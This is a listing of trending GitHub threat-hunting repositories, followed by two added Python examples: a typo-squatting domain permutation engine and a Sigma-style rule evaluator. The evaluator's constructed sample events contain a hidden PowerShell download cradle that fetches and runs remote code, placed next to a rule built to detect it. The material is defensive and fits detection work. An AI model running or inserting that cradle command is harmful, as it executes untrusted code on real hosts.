Trending repositories for topic threat-hunting
APT-Hunter is a threat hunting tool for Windows event logs, built with a purple team mindset to detect APT movements hidden in the sea of Windows event logs and to decrease the time to uncover suspi...
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case mana...
✨ A curated list of awesome threat detection and hunting resources 🕵️♂️
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine developed by the OISF and the Suricata community.
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
Threat hunting queries for Microsoft 365 Defender (XDR). Provides out-of-the-box KQL hunting queries for App, Email, Identity and Endpoint.
This is a real-world malware collection I have compiled, analysed by researchers, to understand more about malware threats, analysis and mitigation.
Bringing you the best of the worst files on the Internet.
A suite for hunting suspicious targets, exposing domains and discovering phishing.
DetectionLabELK is a fork from DetectionLab with ELK stack instead of Splunk.
Scirius is a web application for Suricata ruleset management and threat hunting.
Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation
Rapidly Search and Hunt through Windows Forensic Artefacts
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
Repository created to gather information, sources (websites/portals) and OSINT tricks in the Brazilian context.
Malwoverview is a first response tool used for threat hunting and offers intel information from Virus Total, Hybrid Analysis, URLHaus, Polyswarm, Malshare, Alien Vault, Malpedia, Malware Bazaar, Threa...
A curated list of annual cyber security reports
A large repository of malware samples with 2500+ malware samples & source codes for a variety of platforms by Cryptware Apps.
A collection of PowerShell modules designed for artifact gathering and reconnaissance of Windows-based endpoints.
A repository of KQL queries focused on threat hunting and threat detection for Microsoft Sentinel & Microsoft XDR (formerly Microsoft 365 Defender).
Sysmon configuration file template with default high-quality event tracing
Covers various security approaches to attack techniques and also provides new discoveries about security breaches.
This repository contains Open Source freely usable Threat Intel feeds that can be used without additional requirements. Contains multiple types such as IP, URL, CVE and Hash.
Newly registered Domain Monitoring to detect phishing and brand impersonation with subdomain enumeration and source code scraping
YARA detection rules for hunting with the threathunting-keywords project
M365/Azure adversary simulation tool designed to simulate adversary techniques and generate attack telemetry.
AttacKG: Constructing Knowledge-enhanced Attack Graphs from Cyber Threat Intelligence Reports
Clusters and elements to attach to MISP events or attributes (like threat actors)
Sublime rules for email attack detection, prevention, and threat hunting.
Awesome list of keywords and artifacts for Threat Hunting sessions
Collection of Remote Monitoring and Management (RMM) tool artifacts, for assisting forensics and investigations
PowerShell script to help speed up threat hunting and incident response processes
Sigma detection rules for hunting with the threathunting-keywords project
PoC showcasing new DarkGate Install Script retrieval technique via DNS TXT Record
Tool to detect and monitor GitHub org users' public repositories for secrets and sensitive files
Microsoft 365 Advanced Hunting Queries with hotlinks that plug the query right into your tenant
Crawlector is a threat hunting framework designed for scanning websites for malicious objects.
Pretrained BERT model for cyber security text that has learned cyber security knowledge
Purple team simulation and detection scripts that trigger events for SOC detections
This repository contains Splunk queries to hunt some anomalies
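Worked example of what the domain name permutation engine and the newly registered domain monitor listed above do, added here for illustration and not taken from dnstwist or any other listed project: it derives typo-squatting, homoglyph, keyword-lure and TLD-swap candidates for a monitored brand domain, canonicalises IDN labels to punycode so that a homograph registered as `xn--...` still matches, and checks a constructed feed of newly registered domains against the candidates. The HOMOGLYPHS table, KEYWORDS, ALT_TLDS and the NEW_DOMAINS feed are assumptions chosen for this example.

```python
"""Domain-name permutation engine in the spirit of dnstwist.

Added example, not dnstwist's code. It derives typo-squatting, homoglyph,
keyword-lure and TLD-swap candidates for a monitored domain and matches a
constructed feed of newly registered domains against them.
"""

# Illustrative subsets (assumed for this example; real engines carry far larger tables).
HOMOGLYPHS = {
    "a": ["4", "á"],
    "e": ["3", "é"],
    "i": ["1", "l"],
    "l": ["1", "i"],
    "o": ["0", "ó"],
    "s": ["5"],
    "m": ["rn"],
    "w": ["vv"],
}
KEYWORDS = ["login", "secure", "support"]
ALT_TLDS = ["com", "net", "org", "co", "io"]


def canonical(fqdn):
    """Lower-case the name and encode IDN labels as punycode, so that
    'Exámple.com' and 'xn--exmple-qta.com' compare equal. Raises UnicodeError
    on labels that are empty, too long or not IDNA-encodable."""
    return fqdn.strip().lower().rstrip(".").encode("idna").decode("ascii")


def permutations(fqdn):
    """Return {technique: set of candidate FQDNs} for the monitored domain."""
    fqdn = canonical(fqdn)
    name, _, tld = fqdn.rpartition(".")
    n = len(name)
    by_technique = {
        "omission": {name[:i] + name[i + 1:] for i in range(n)},
        "transposition": {name[:i] + name[i + 1] + name[i] + name[i + 2:]
                          for i in range(n - 1) if name[i] != name[i + 1]},
        "repetition": {name[:i] + name[i] + name[i:] for i in range(n)},
        "hyphenation": {name[:i] + "-" + name[i:] for i in range(1, n)},
        "keyword": {f"{name}-{kw}" for kw in KEYWORDS} | {f"{kw}-{name}" for kw in KEYWORDS},
        "homoglyph": {name[:i] + sub + name[i + 1:]
                      for i, ch in enumerate(name) for sub in HOMOGLYPHS.get(ch, [])},
    }
    result = {tech: {canonical(f"{label}.{tld}") for label in labels if label}
              for tech, labels in by_technique.items()}
    result["tld-swap"] = {f"{name}.{alt}" for alt in ALT_TLDS if alt != tld}
    for candidates in result.values():
        candidates.discard(fqdn)  # the monitored domain itself is never a finding
    return result


def build_index(fqdn):
    """Flatten permutations into {candidate: technique}; a candidate reachable
    by several techniques keeps the first technique that generated it."""
    index = {}
    for tech, candidates in permutations(fqdn).items():
        for cand in candidates:
            index.setdefault(cand, tech)
    return index


def match_feed(monitored, feed):
    """Return {observed_domain: technique} for feed entries that are
    permutations of the monitored domain. Malformed entries are skipped."""
    index = build_index(monitored)
    hits = {}
    for observed in feed:
        try:
            key = canonical(observed)
        except UnicodeError:
            continue
        if key in index:
            hits[observed] = index[key]
    return hits


# Constructed sample of "newly registered" domains (not real registrations).
NEW_DOMAINS = [
    "examp1e.com",          # l -> 1
    "exarnple.com",         # m -> rn
    "exmaple.com",          # adjacent-character transposition
    "xn--exmple-qta.com",   # punycode form of exámple.com
    "example-login.com",    # brand plus lure keyword
    "example.io",           # TLD swap
    "totally-unrelated.org",
]

if __name__ == "__main__":
    for domain, technique in match_feed("example.com", NEW_DOMAINS).items():
        print(f"{domain:24} {technique}")
```

Feeding a real newly-registered-domain list through `match_feed` is the monitoring loop the listed monitors automate; the punycode canonicalisation matters because such feeds usually carry the `xn--` form rather than the rendered Unicode name.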
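Worked example, in the spirit of the Sigma-based timeline generator and the Sigma rule sets listed above, of how a Sigma-style rule is evaluated against Windows process-creation events and turned into a hunting timeline. This is added illustration, not Hayabusa's or any listed project's code: the two rules are written as Python dicts mirroring Sigma's YAML layout, the events are constructed samples using Sigma's process_creation field names (Image, CommandLine, User), and only the contains/startswith/endswith/all modifiers and and/or/not conditions are implemented, an assumed subset of Sigma.

```python
"""Minimal Sigma-style rule evaluator producing a hunting timeline.

Added example, not Hayabusa's or the Sigma project's code. Supported (an
assumed subset of Sigma): field modifiers contains/startswith/endswith/all,
maps (AND) and lists of maps (OR) as detection blocks, and conditions built
from and/or/not over block names.
"""
import ast


def _norm(value):
    """Sigma string matching is case-insensitive; compare everything lower-cased."""
    return str(value).lower()


def _match_field(event, key, expected):
    """Evaluate one 'Field|modifier...' entry. A field absent from the event never matches."""
    field, *mods = key.split("|")
    if field not in event:
        return False
    actual = _norm(event[field])
    values = [_norm(v) for v in (expected if isinstance(expected, list) else [expected])]
    if "contains" in mods:
        test = lambda v: v in actual
    elif "startswith" in mods:
        test = lambda v: actual.startswith(v)
    elif "endswith" in mods:
        test = lambda v: actual.endswith(v)
    else:
        test = lambda v: actual == v
    # A list of values is OR by default; the 'all' modifier makes it AND.
    return all(map(test, values)) if "all" in mods else any(map(test, values))


def _match_block(event, block):
    """A map matches when every entry matches; a list of maps when any map matches."""
    if isinstance(block, list):
        return any(_match_block(event, item) for item in block)
    return all(_match_field(event, key, value) for key, value in block.items())


def _eval_condition(condition, results):
    """Evaluate e.g. 'selection and not filter' without eval(): the text is parsed
    with ast and only boolean operators and block names are accepted."""
    def walk(node):
        if isinstance(node, ast.Name):
            return results[node.id]
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
            return not walk(node.operand)
        if isinstance(node, ast.BoolOp):
            combine = all if isinstance(node.op, ast.And) else any
            return combine(walk(value) for value in node.values)
        raise ValueError(f"unsupported condition syntax: {ast.dump(node)}")
    return walk(ast.parse(condition, mode="eval").body)


def rule_matches(rule, event):
    detection = rule["detection"]
    results = {name: _match_block(event, block)
               for name, block in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], results)


def hunt(rules, events):
    """Run every rule over every event; return the hits sorted into a timeline."""
    hits = []
    for event in events:
        for rule in rules:
            if rule_matches(rule, event):
                hits.append({"time": event["TimeCreated"], "computer": event["Computer"],
                             "level": rule["level"], "rule": rule["title"],
                             "details": event.get("CommandLine", event.get("Image", ""))})
    return sorted(hits, key=lambda hit: hit["time"])


# Two illustrative rules written for this example (assumed, not from a published rule set).
RULES = [
    {"title": "PowerShell download cradle", "level": "high",
     "detection": {"selection": {"EventID": 4688,
                                 "CommandLine|contains|all": ["powershell", "downloadstring"]},
                   "filter": {"User|endswith": "\\svc_patch"},  # assumed vetted patching account
                   "condition": "selection and not filter"}},
    {"title": "Rundll32 loading a DLL from a user-writable path", "level": "medium",
     "detection": {"selection": {"EventID": 4688, "Image|endswith": "\\rundll32.exe",
                                 "CommandLine|contains": ["\\appdata\\", "\\temp\\", "\\public\\"]},
                   "condition": "selection"}},
]

# Constructed sample events (not from a real host); field names follow Sigma's process_creation source.
EVENTS = [
    {"TimeCreated": "2024-05-01T09:12:03Z", "Computer": "WS01", "EventID": 4688, "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"TimeCreated": "2024-05-01T09:10:00Z", "Computer": "SRV02", "EventID": 4688, "User": "CORP\\svc_patch",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadString('http://patch.corp.example/run.ps1')"},
    {"TimeCreated": "2024-05-01T09:15:44Z", "Computer": "WS01", "EventID": 4688, "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\x.dll,Start"},
    {"TimeCreated": "2024-05-01T09:16:00Z", "Computer": "WS03", "EventID": 4688, "User": "CORP\\bob",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"TimeCreated": "2024-05-01T08:59:10Z", "Computer": "WS01", "EventID": 4624, "User": "CORP\\alice"},
]

if __name__ == "__main__":
    for hit in hunt(RULES, EVENTS):
        print(f"{hit['time']} {hit['computer']:6} {hit['level']:6} {hit['rule']}: {hit['details']}")
```

The filter block is the part hunters most often get wrong: an exclusion that matches on a trailing account name, as here, is only as safe as the assumption that nobody else can run under that name, so the filtered event from SRV02 is worth a second look rather than silent suppression.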